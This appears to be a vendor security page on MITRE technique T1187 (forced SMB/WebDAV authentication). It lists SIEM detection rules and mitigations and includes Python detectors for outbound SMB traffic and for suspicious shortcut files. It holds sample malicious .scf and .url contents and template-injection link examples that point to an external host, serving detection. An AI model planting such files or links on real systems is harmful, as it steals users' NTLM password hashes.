MaxPatrol SIEM

Detects cyber incidents that undermine the cyber resilience of a company

T1187: Forced Authentication

Adversaries may gather credential material by invoking or forcing a user to automatically provide authentication information through a mechanism in which they can intercept.

The Server Message Block (SMB) protocol is commonly used in Windows networks for authentication and communication between systems for access to resources and file sharing. When a Windows system attempts to connect to an SMB resource it will automatically attempt to authenticate and send credential information for the current user to the remote system. This behavior is typical in enterprise environments so that users do not need to enter credentials to access network resources.

Web Distributed Authoring and Versioning (WebDAV) is also typically used by Windows systems as a backup protocol when SMB is blocked or fails. WebDAV is an extension of HTTP and will typically operate over TCP ports 80 and 443.

Adversaries may take advantage of this behavior to gain access to user account hashes through forced SMB/WebDAV authentication. An adversary can send an attachment to a user through spearphishing that contains a resource link to an external server controlled by the adversary (i.e. Template Injection), or place a specially crafted file on a navigation path for privileged accounts (e.g. an .SCF file placed on the desktop) or on a publicly accessible share to be accessed by the victim(s). When the user's system accesses the untrusted resource, it attempts authentication and sends information, including the user's hashed credentials, over SMB to the adversary-controlled server. With access to the credential hash, an adversary can perform offline brute-force cracking to recover the plaintext credentials.

There are several different ways this can occur. Some specifics from in-the-wild use include:

  • A spearphishing attachment containing a document with a resource that is automatically loaded when the document is opened (i.e. Template Injection). The document can include, for example, a request similar to file[:]//[remote address]/Normal.dotm to trigger the SMB request.
  • A modified .LNK or .SCF file with the icon filename pointing to an external reference such as \\[remote address]\pic.png that will force the system to load the resource when the icon is rendered, repeatedly gathering credentials.

Positive Technologies products that cover the technique

MaxPatrol SIEM knowledge base

mitre_attck_cred_access: PT-CR-1075: Dangerous_Theme: A potentially malicious Windows theme that is used to steal usernames and password hashes is applied
mitre_attck_cred_access: PT-CR-1204: Coerce_Auth: The NTLM hash of a host machine account is intercepted as a result of authentication coercion
mitre_attck_lateral_movement: PT-CR-784: Auth_Coerce_with_WebClient_Abuse: Use of WebClient to force HTTP authorization (port 80) on an attacking host via PetitPotam or PrinterBug is detected
vulnerabilities: PT-CR-2297: CVE_2024_21413_Outlook_MonikerLink: Exploitation of vulnerability CVE-2024-21413 in Outlook. The vulnerability allows an attacker to send a victim an email with a hyperlink to a shared network resource and bypass the Outlook warning when the email is opened. This can be used to execute arbitrary code or to obtain the user's NetNTLM hash.
mitre_attck_cred_access: PT-CR-913: Subrule_Coerce_Auth: Possible authentication coercion is detected
mitre_attck_cred_access: PT-CR-914: Subrule_Egress_System: Connection to an attacker host that might indicate a coerced authentication is detected
mitre_attck_cred_access: PT-CR-2348: SCF_or_URL_Forced_Authentication: Possible forced user authentication using .scf or .url files. Such authentication allows attackers to obtain the NTLM password hashes of users who open a network share containing these files with Windows Explorer. Attackers can then use these hashes for attacks such as Pass-the-Hash, or brute-force them to recover plaintext passwords and use those to gain access to other systems.
mitre_attck_cred_access: PT-CR-2349: SCF_or_URL_File_Created: Possible forced user authentication using .scf or .url files. Such authentication allows attackers to obtain the NTLM password hashes of users who open a local folder or network share containing these files with Windows Explorer. Attackers can then use these hashes for attacks such as Pass-the-Hash, or brute-force them to recover plaintext passwords and use those to gain access to other systems.
active_directory_attacks: PT-CR-837: KrbRelay_Usage: There are signs of use of the KrbRelay or DavRelayUp utility, which exploits the absence of LDAP request signing to relay the authentication process and obtain a TGS ticket for the SPN account on behalf of the administrator. After that, an attacker can elevate their privileges to local administrator and execute malicious code on the compromised node.
active_directory_attacks: PT-CR-2225: ADCS_CRL_Abusing: Suspicious activity with a certificate revocation list (CRL). Access to a CRL allows attackers to force the CA server to authenticate on a remote server or remotely execute code on the CA server. For this rule to work, you must complete the "CRL_Publication_Time" tabular list.
active_directory_attacks: PT-CR-2226: ADCS_Certify_Coerce: The NTLM hash or TGT of a CA server account was obtained using coerced authentication. This data can then be used to compromise the CA server and further develop the attack.
pt_nad: PT-CR-2417: NAD_NTLM_to_External: PT NAD detected a Net-NTLM hash being sent from a host to the Internet

Detection

ID: DS0029
Data source and component: Network Traffic: Network Traffic Content
Description:

For internal traffic, monitor for workstation-to-workstation SMB traffic that is unusual versus the baseline. For many networks there should not be any, but it depends on how systems on the network are configured and where resources are located.

ID: DS0029
Data source and component: Network Traffic: Network Traffic Flow
Description:

Monitor for SMB traffic on TCP ports 139 and 445 and UDP port 137, and for WebDAV traffic, attempting to exit the network to unknown external systems. If attempts are detected, investigate endpoint data sources to find the root cause.
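As an added illustration of the flow-based check above (example code, not MaxPatrol SIEM rule logic), the following Python flags SMB and WebDAV flows that leave RFC 1918 address space. It assumes constructed flow records with a proxy-supplied HTTP user agent, because plain port 80/443 egress by itself cannot be told apart from ordinary browsing.

```python
"""Flag SMB and WebDAV flows that leave the enterprise network.
Added example, not MaxPatrol SIEM rule logic. Assumes constructed flow records
of the form '<ts> <src_ip> <dst_ip> <dst_port> <proto> [<http_user_agent>]',
where a web proxy supplies the user agent for HTTP flows.
"""
import ipaddress

SMB_PORTS = {("tcp", 139), ("tcp", 445), ("udp", 137)}
WEBDAV_PORTS = {80, 443}
# The Windows WebDAV redirector (WebClient service) announces itself with this user agent.
WEBDAV_UA_PREFIX = "Microsoft-WebDAV-MiniRedir"
# Assumed definition of "internal": RFC 1918 space.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Constructed sample records (not real traffic); external hosts use documentation addresses.
SAMPLE_FLOWS = """\
2024-05-01T10:00:01Z 10.0.1.15 10.0.2.20 445 tcp
2024-05-01T10:00:02Z 10.0.1.15 203.0.113.7 445 tcp
2024-05-01T10:00:03Z 10.0.1.22 198.51.100.9 80 tcp Microsoft-WebDAV-MiniRedir/10.0.19041
2024-05-01T10:00:04Z 10.0.1.22 198.51.100.9 443 tcp Mozilla/5.0
2024-05-01T10:00:05Z 10.0.1.30 203.0.113.7 137 udp
2024-05-01T10:00:06Z 10.0.1.30 10.0.2.20 139 tcp
"""

def is_internal(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)

def classify(line: str):
    """Return ('smb' | 'webdav', src, dst) for an egress flow, otherwise None."""
    fields = line.split(maxsplit=5)
    if len(fields) < 5:
        return None                  # malformed record: skip it, do not crash the pipeline
    _ts, src, dst, port, proto = fields[:5]
    user_agent = fields[5] if len(fields) > 5 else ""
    if is_internal(dst):
        return None                  # internal-to-internal SMB is judged against the baseline instead
    port = int(port)
    if (proto.lower(), port) in SMB_PORTS:
        return ("smb", src, dst)
    # Plain 80/443 egress is ordinary browsing; only the redirector's user agent marks WebDAV.
    if port in WEBDAV_PORTS and user_agent.startswith(WEBDAV_UA_PREFIX):
        return ("webdav", src, dst)
    return None

def find_egress_auth(log_text: str) -> list:
    """Every flow in the log that could carry coerced NTLM authentication out of the network."""
    return [hit for hit in map(classify, log_text.splitlines()) if hit]
```

Each hit is a candidate for the endpoint investigation the description calls for; the source host is where the triggering file or document should be looked for.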

ID: DS0022
Data source and component: File: File Access
Description:

Monitor for unexpected files used to gather credentials when the files are rendered.

ID: DS0022
Data source and component: File: File Modification
Description:

Monitor for changes made to .LNK, .SCF, or any other files on systems and within virtual environments that contain resources pointing to external network resources.

ID: DS0022
Data source and component: File: File Creation
Description:

Monitor for newly created .LNK, .SCF, or any other files on systems and within virtual environments that contain resources pointing to external network resources.
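For the file access, modification and creation checks above, here is an added example (not a MaxPatrol SIEM rule) that parses .scf and .url file bodies and reports the values that would make Explorer reach an external host when the file is rendered. The internal DNS suffix corp.example, the RFC 1918 definition of "internal" and the sample file contents are assumptions; .lnk is a binary format and is not handled here.

```python
"""Scan .scf and .url shortcut bodies for targets that point outside the network.
Added example, not a MaxPatrol SIEM rule. Assumes 'corp.example' is the internal DNS
suffix and RFC 1918 space is internal; .lnk is a binary format and is not parsed here.
"""
import ipaddress
import re
from urllib.parse import urlparse

INTERNAL_SUFFIX = ".corp.example"
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
# Keys whose value Explorer fetches (and authenticates to) when it renders the file.
REMOTE_KEYS = ("iconfile", "iconlocation", "url")
UNC_RE = re.compile(r"^\\\\([^\\@]+)(?:@\d+)?\\")   # \\host[@port]\share\...

# Constructed samples; the external host is a documentation address.
MALICIOUS_SCF = "[Shell]\r\nIconFile=\\\\203.0.113.7\\share\\pic.ico\r\n"
MALICIOUS_URL = ("[InternetShortcut]\r\nURL=file://203.0.113.7/share/doc.docx\r\n"
                 "IconFile=\\\\203.0.113.7\\share\\icon.ico\r\nIconIndex=1\r\n")
BENIGN_URL = ("[InternetShortcut]\r\nURL=https://intranet.corp.example/\r\n"
              "IconFile=C:\\Windows\\System32\\shell32.dll\r\n")

def host_is_external(host: str) -> bool:
    host = host.strip("[]").lower()
    try:
        return not any(ipaddress.ip_address(host) in net for net in INTERNAL_NETS)
    except ValueError:                       # a hostname, not an address
        return "." in host and not host.endswith(INTERNAL_SUFFIX)

def remote_host(value: str):
    """Host a UNC path or file:// URL would contact; None for local paths and http(s) links."""
    match = UNC_RE.match(value.strip())
    if match:
        return match.group(1)
    if value.strip().lower().startswith("file:"):
        return urlparse(value.strip()).hostname or None
    return None

def scan_shortcut_text(text: str) -> list:
    """Return (key, host) for every value that would make Explorer authenticate to an external host."""
    hits = []
    for line in text.splitlines():
        if "=" not in line or line.startswith(("[", ";")):
            continue
        key, _, value = line.partition("=")
        host = remote_host(value)
        if key.strip().lower() in REMOTE_KEYS and host and host_is_external(host):
            hits.append((key.strip(), host))
    return hits
```

Run it from a file-creation or file-modification event handler on the newly written .scf/.url content; single-label NetBIOS names and addresses inside the internal ranges are left alone so that ordinary intranet shortcuts do not alert.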

Mitigation

ID: M1027
Name: Password Policies
Description:

Use strong passwords to increase the difficulty of cracking credential hashes if they are obtained.

ID: M1037
Name: Filter Network Traffic
Description:

Block SMB traffic from exiting an enterprise network with egress filtering or by blocking TCP ports 139 and 445 and UDP port 137. Filter or block WebDAV protocol traffic from exiting the network. If access to external resources over SMB and WebDAV is necessary, the traffic should be tightly limited with allowlisting.